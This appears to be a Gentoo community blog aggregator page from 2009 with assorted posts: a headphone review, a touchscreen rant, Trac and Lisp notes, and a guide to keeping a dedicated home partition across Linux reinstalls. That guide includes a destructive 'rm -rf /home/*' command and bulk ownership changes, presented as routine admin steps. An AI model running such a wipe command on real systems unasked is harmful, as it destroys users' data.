I don't know your hands, but here's one of mine. As you can see, I have rather slim fingers. I'm just saying that because it is somewhat relevant to the next complaint: touchscreens suck because you have your bloody fingers in exactly the area where the content you are trying to read is, covering it. I don't know who thought it was a good idea, but it is the main complaint against touchscreens. Screen real estate is precious, especially on mobile devices where the amount of pixels is quite limited. Why would I put my hand over the small area where the stuff I wanna see is? I don't know about you, but my hand is quite opaque.

Touchscreens look nice and allow some real eye-candy, but from a usability standpoint and from a common sense standpoint they are completely backwards. And that, my friends and readers, is why touchscreens suck.

Now let's see if someone can bring some good arguments for touchscreens, post them into the comments.

ATH-AD700 Review

Recently I got my ATH-AD700 headphones. I've been FAR more excited than anyone has a right to be, waiting for these things to show up, like Christmas in August. Sweet, sweet anticipation. It was well worth the wait.

The only other headphones I have to compare these with are my Grado SR80's (which have really seen better days) and some Shure "noise-cancelling" earbuds which are nice but are not comparable to either. So I'll compare the AD700 to the SR80's. ATH-AD700's are pictured left, Grado SR80's are right.


(Note: Nowhere in this article shall I refer to anything as "cans". I reserve the right to retain some level of self-righteous, snobbish disdain for the audiophile community.)

ATH-AD700 in two words: Freaking Huge.

One cannot overstate how enormous the AD700's are. I thought the SR80's were big but the AD700's make me feel like a toddler. They literally engulf your face like the hand of a giant. If you have a tiny head you might have problems even keeping them on your head.

These are the kind of headphones that completely surround your ear rather than sit on your ear. With the AD700's I could probably fit 2 or 3 more ears into the cups along with mine.

There is no way you will wear these and not look completely ridiculous to those around you.

And yet, freaking comfortable.

In spite of their size, the AD700's are very light. They seem to be made of some kind of thin plastic with aluminum grated sides and a few metal finishing bits. They barely feel like anything when you put them on. I've worn them for many hours without discomfort.

And they feel wonderful. The pads are some kind of soft comfy velour fabric. These headphones are not manually adjustable; instead there are little 3-D flaps on top that auto-adjust on springs, and they seem to help equally distribute weight around your head so it isn't all bearing down directly on your ears. The lack of a proper "band" probably contributes to keeping them light. When you put the AD700's on, and you feel everything magically shift around to fit your head, it's a freakish (yet strangely entertaining) experience. I felt like a cyborg.

By comparison, you can't forget you're wearing SR80's. They are mostly metal and thick heavy plastic and they hurt after a half hour. The cups are hard plastic and the foam pads are oddly shaped so that your ear inevitably sits directly on the poky, scratchy plastic of the drivers. From the first day I owned the SR80's there was no mistaking that they were painful, and they've gotten far worse over time. I put up with the SR80's in spite of this because they sound great.

Which brings us to...

Sound quality

The AD700's really do sound awesome. I had my doubts how much different they'd be from my SR80's, but there is definitely a noticeable difference.

The AD700's are very detailed compared to the SR80's. The SR80's have an overwhelming amount of bass and it drowns out the vocals on a lot of my songs. I'd never noticed until I put on the AD700's and heard the difference.

My music of choice is metal, industrial, hard rock, soft rock, a bit of techno and J-pop, and they all sound great. I don't have to screw around with the equalizer settings on my MP3 player just to be able to hear the vocals clearly, as I sometimes did with the SR80's. The AD700's are probably what people call "neutral".

When I listened to one song of a live concert on the AD700's, I actually heard a police siren in the background as a cop car apparently drove down the street outside the concert hall. I'd listened to that song probably 50 times on my SR80's, and never heard that. There were actually many times this week when I was sitting in my office at work and heard what I thought was a sound behind me, and as I looked around trying to find what was making that noise, I realized it was in the music. It's a bit unnerving.

If your main criteria is bass, the SR80's are probably better. I thought I really liked bass to the exclusion of all else, but maybe I'm getting old or maybe my tastes are changing, because the bass on the AD700's is more than good enough for me. It's definitely weaker but it's also clearer.

Anything else I can say about these is going to be even more subjective and unhelpful than what I already wrote, but I think I do prefer the sound of the AD700's over the SR80's at this point. To be clear though, both of these headphones sound amazingly good and I was very happy with my SR80's for years and years. (The AD700's also have the advantage of being shiny and new and I'm sure this skews my opinion.)

Note that these are "open" headphones, so they will leak noise. People sitting next to you will hear your music. This isn't an issue for me but it may be for some.

Build quality

I won't be able to make a real comparison until I bang the AD700's around for four years in my briefcase like I did with my SR80's, but at a glance they certainly look and feel sturdy. Some of the ridiculous design flaws of the SR80's (like the ever-spinning cups that result in crimped and broken wires) are joyously absent in the AD700's. The headphone cord comes out of only one side of the headphones, which helps you not to feel like you're being strangled by two cords meeting under your chin as with the SR80's. The headphone wire itself is thinner than the SR80's but also feels more flexible and hopefully less likely to snap.

(The cord on both pairs is way too long, and I end up looping it and twist-tying it to avoid tripping over it or running it over in my office chair. But too long is better than too short.)

Even the box the AD700's came in was impressive. It had nice Japanese writing all over, and to open it was like unfolding origami.


I got the AD700's for less than $80, new. The MSRP is supposedly $250. I don't know if I got an insanely good deal or if the MSRP is artificially inflated, but you can still get the AD700's on Amazon for around $80 if you look around.

This is $10-20 cheaper than Grado SR80's. I don't think the price difference is significant. I think both headphones are easily worth $80-100. Are they worth $250? Er... maybe not.


ATH-AD700: I love these things. I suggest, nay, demand that you buy them. They feel and sound very good. I am glad I didn't get replacement Grado SR80's as I originally planned.

I think it is easily worth spending $100 to get a "good" pair of headphones. Even if all you listen to is a crappy MP3 player, it makes a huge difference in how much you will enjoy your music. But I also use headphones when I'm at my computer, or even when I'm gaming. For me music is essential for avoiding distractions while programming, and these headphones are excellent for that purpose (especially because of the comfort).

The only bad thing about the AD700's is how ridiculous I look wearing novelty-sized, bright purple headphones in public. Personally, I will pay the price of bearing that shame.

Falcon Programming Language

I have discovered a new programming language called Falcon. Pretty nice little programming language. It’s written in C with a little C++ and is very confused about what kind of language it wants to be. It’s pretty fun to play around with because, I won’t lie, I have no honest use for it. But all jokes aside I like it pretty well; I think I’ll replace all my ruby shenanigans with Falcon. Not that I write a lot of code in Ruby either, but when I want to play I play in Ruby land. From now on, though, I’m going to play in Falcon land, where everything is written in C/C++ (not just part of it, like Ruby) and scripts are compiled into binaries before they are actually run. Pretty nice. The only downside is that there is no vim syntax file for it that I can find. But fear not! I have written one… err, I have started one. It’s not perfect by any means, I’m sure it leaves a lot out, and it is probably broken (okay, I know it’s broken) in several places. But that’s the beauty of open source. So please help me with it if you know anything about vim syntax files and have an interest in Falcon.


Which brings me to my final point for the post. I have finally broken down (or got off my ass, however you look at it) and created an account at github. Now you can see just how worthless an open source contributor I really am :) .

Enjoy the Penguins!

UPDATE: Nothing makes you look more like a tool than to have someone correct you the moment after you post to the world. A syntax file does exist for vim. I think I’m going to stick to mine but update the broken parts based on his (this is open source, after all). The only place I know to find what I suppose is the “official” version is on Falcon’s svn:


Posts for Monday, August 17, 2009

Dedicated Home Partition



How to reuse the same home partition (i.e. preferences, Documents…) when reinstalling a distro or installing a new one.

Before Installing

Find the user and group ids (uid and gid) on your current distro before reinstalling/adding the new distro, and write them down:


And the username of your regular user:
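The exact commands didn't survive in the original post, but the standard way to get these values is (a sketch):

```shell
# Record your current numeric ids and username before reinstalling.
id -u    # user id (uid), typically 1000 for the first regular user
id -g    # group id (gid)
whoami   # your regular username
```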


Get your home partition fstab entry:

grep home /etc/fstab

If your fstab uses a UUID, keep in mind that this will change if you change your partition map.

Note: If you only want to change the permissions on the home partition to match a new install, see the final step.


During the installation process you will be asked about partitioning. Do not partition unless you know what you are doing. Some distros will safely allow resizing and adding new partitions, and some partitioning tools can safely shrink, expand, and add partitions. If you need a new partition or a reorganization of partitions, consider adding gparted to the installer CD if it isn’t there already and partitioning with that.

Once you have your disk partitioned, start the installer and manually set the partitions you plan to use. Don’t use the dedicated home partition, or the installer will likely erase it. Also, during the install, don’t use the username from your previous install: the installer will likely choose a different uid and gid, so it’s best not to; matching ids will be set up later. Finish the installation and reboot.

After Reboot

Exit if automatically logged in and go to a console with Ctrl+Alt+F1. Log in as root (or ‘su -‘ to root from a regular user if on Ubuntu) and find out what the newly created user’s uid/gid is.

id <new-username>

Keep a note of the groups the distro added, and also be sure the new user didn’t get the same uid as the one you already had.

Add a new user:


For the username, select your old username; for the uid, match the old one. If you’d like to prevent possible uid conflicts in the future, consider using a higher uid like 1050. Enter a gid to match the one you are using on the new system. Then add the groups that match the user the distro created.

You can also use the ‘useradd‘ command but I find the former easier. For example on my gentoo system:

useradd -d /home/user --uid 1050 -G adm,audio,cdrom,cdrw,fcron,portage,users,usb,video,wheel -s /bin/bash user

Delete the distro-created user:

userdel <username>

And delete that user’s folder in the home directory:

rm -rf /home/*

This will delete everything in the home folder (it is not sane to mount a partition on a folder that already has contents).

Add home partition to fstab

Add the home partition so it is mounted at boot (if not already added). For example:

nano /etc/fstab
...
/dev/sda5   /home   ext4   defaults   0 1

Be sure to enter the correct filesystem type and settings.

Now reboot and login to your new user.

Match your home partition to your new distro ids

Warning: If you’ve done the above, you’re already done; don’t do this.

Mount the home partition and change to the directory of the dedicated home partition:

mount /dev/<home-partition> /mnt/<home-partition>
cd /mnt/<home-partition>

Then change the old user and group id’s to the new one:

find . -uid <old-uid-number> -gid <old-gid-number> -exec chown -h <username>:<usergroup> {} +

This will change ownership of all files/folders/links that have both the old uid and the old gid. A few files will not match, but most programs will eventually write to them and update them. To update all files/folders/links:

find . -exec chown -h <username>:<usergroup> {} +
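Before running the chown, you can preview which files the first find command will match. This dry run uses the current uid/gid purely as stand-ins for the old ones:

```shell
# Safe dry run: list files owned by a given uid/gid without changing anything.
# (Substitute the old uid/gid you wrote down; ours are used for illustration.)
olduid=$(id -u)
oldgid=$(id -g)
find . -uid "$olduid" -gid "$oldgid" -print | head -n 5
```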

Random updates

Some fun with my Trac installs today. First of all, I converted them all to use the inherited .ini file, which avoids fun with “Why isn’t this change having any effect - oh, it’s not even looking at that!”

I also set up non-SSL access to the trac installs, and with a bit of rewrite magick, have it force logged-in users to use SSL. This is actually pretty easy: set “secure_cookies=True” in the trac.ini, then set up the following rewrite rule in the non-SSL virtual host:

RewriteEngine On
RewriteRule ^/([^/]+)/login https://<your-host>/$1/login [L]

Logging in now always redirects to the SSL address, and the cookies are only valid for SSL. (Don’t forget to clear any existing cookies)
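For reference, the trac.ini side of this is a single option (it lives in the [trac] section of Trac's configuration):

```ini
[trac]
secure_cookies = true
```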

For some strange reason, the Icekap trac instance had decided to randomly corrupt itself - it continually claimed it needed upgrading while trac-admin said it didn’t. I solved this by, in the trac installs directory:

mv icekap icekap.bak
../trac-create icekap "Icekap" nosvn
cp icekap.bak/db/trac.db icekap/db/
cp icekap.bak/conf/trac.ini icekap/conf/

trac-create is my own script which optionally creates an svn repo, then creates the trac instance for it - params are: directory “Project Name” [nosvn]

The PPF MediawikiRC plugin has been slowly progressing - it can now handle delete actions nicely, as well as marking minor changes and new articles. There’s probably lots it’s still missing (for example, user blocks is one thing I know it could have extra handling for), but I plan to implement these on a “when I can be bothered” basis now - it’s “good enough” for what I use it for at the moment and I’d rather move on to other projects.

links for 2009-08-17

Posts for Sunday, August 16, 2009

Adding Common Lisp to Apache Thrift

Well, with cl-pack sitting in a (hopefully) finished state, I'm turning my attention back to what got me started on it in the first place: attempting to write Lisp support for Apache Thrift. Thrift is the RPC framework Facebook uses internally; they open sourced it a while ago, and it made its way into the Apache Incubator, where it resides now, getting all kinds of attention. Several languages have been added to it, and it's been generally cleaned up. After watching a video on Facebook's architecture I got interested in Thrift. When I found out there was no Lisp support, I figured I'd take a stab at it. Apparently others have tried but disappeared, so as to whether I'll finish, we can only wait and see, but it seems like a good challenge and something I'd very much like to see done.

The digression onto cl-pack was a wonderful little trip. I learned a bit more about Lisp and lots more about packaging software for Common Lisp. It was a good little project to cut my teeth on and hopefully better prepare me to see this through.

So wish me luck, I'll probably need it for this larger undertaking. Approach #1 is reading the Ruby code and then writing similar CLOS Lisp code. It seems like a decent approach off the top of my head.

Moved to Linode

My web host for a good long while was Futurehosting. My OS was Debian 4.0 (Etch). Strike one: as of now there's still no option to upgrade to a newer version of Debian. Debian lags so much to begin with, it's really painful if you want to use anything released in the past two years.

I had an unmanaged VPS. I ran a bunch of funky non-standard stuff on there and it ran mostly OK. I had to upgrade to get more RAM just so SBCL would run on it, which sucked but I don't know that another host would've been any better.

The good thing about Futurehosting was that they responded very fast to tickets. The bad thing was the fact that I had ample opportunity to know this. The server would go down randomly once every month or two. I'd open a ticket saying "Hi my server is down", then things would be working again in a half hour, but why did this happen so often? I don't know. An awful lot of "failed switches". I wonder how often this happened without my knowing about it, given how often it happened in the middle of my using the server for something.

With all the hardware they were burning through I would've expected upgrades or price reductions over time, given that I was a steady customer for so long and that disk space and memory keeps becoming cheaper and cheaper in the world. But the prices always stayed the same, which was another strike.

Being hosted there was annoying but never annoying enough to switch. And migrating all of my sites and data to another server seemed like a huge pain. Momentum: the worst enemy of progress.

I moved to a new host on a whim recently: Linode. It was far less painful than I expected. Thanks to Linux and plaintext config files, it was mostly a SCP-it-all-over and tweak process. It took me one evening and a bit of time the next morning. Linode offers a lot of OSes which is also nice.

I pay less for Linode than I did at FH (and I get fewer resources at Linode, but I don't need much). Thus far I'm astonished how much faster things are running on the server. Even goofing off at a terminal, the shell is more responsive. My email loads instantly in kmail instead of lagging for a second. I never knew what I was missing. Linode's DNS control panel is also pretty braindead simple to use.

Futurehosting gets a C+ from me. It worked and my website existed, but it didn't knock my socks off. Hopefully Linode is better.

Install Lisp ASDF packages as a user with CLC

CLC, or Common Lisp Controller, is a system that other Lisp systems use to keep track of ASDF systems (a mouthful, I know). By default, system packages are installed to /usr/share/common-lisp/, but what happens if you don't have root access and still want to leverage the ease of use that CLC-installed ASDF packages provide?

clc-register-user-package to the rescue! Create ~/.clc/source and put your ASDF package there, then simply run

$ clc-register-user-package ~/.clc/source/package/package.asd

and voila, you can (require :package) from any of your Lisp systems thereafter.
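Spelled out for a hypothetical package named mylib, the whole dance is:

```shell
# Create the per-user source directory CLC looks in, for a hypothetical
# package called "mylib":
mkdir -p ~/.clc/source/mylib
# Copy mylib.asd and its source files there, then register it:
#   clc-register-user-package ~/.clc/source/mylib/mylib.asd
```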

It's pretty awesome. :)

Planet Larry is not officially affiliated with Gentoo Linux. Original artwork and logos copyright Gentoo Foundation. Yadda, yadda, yadda.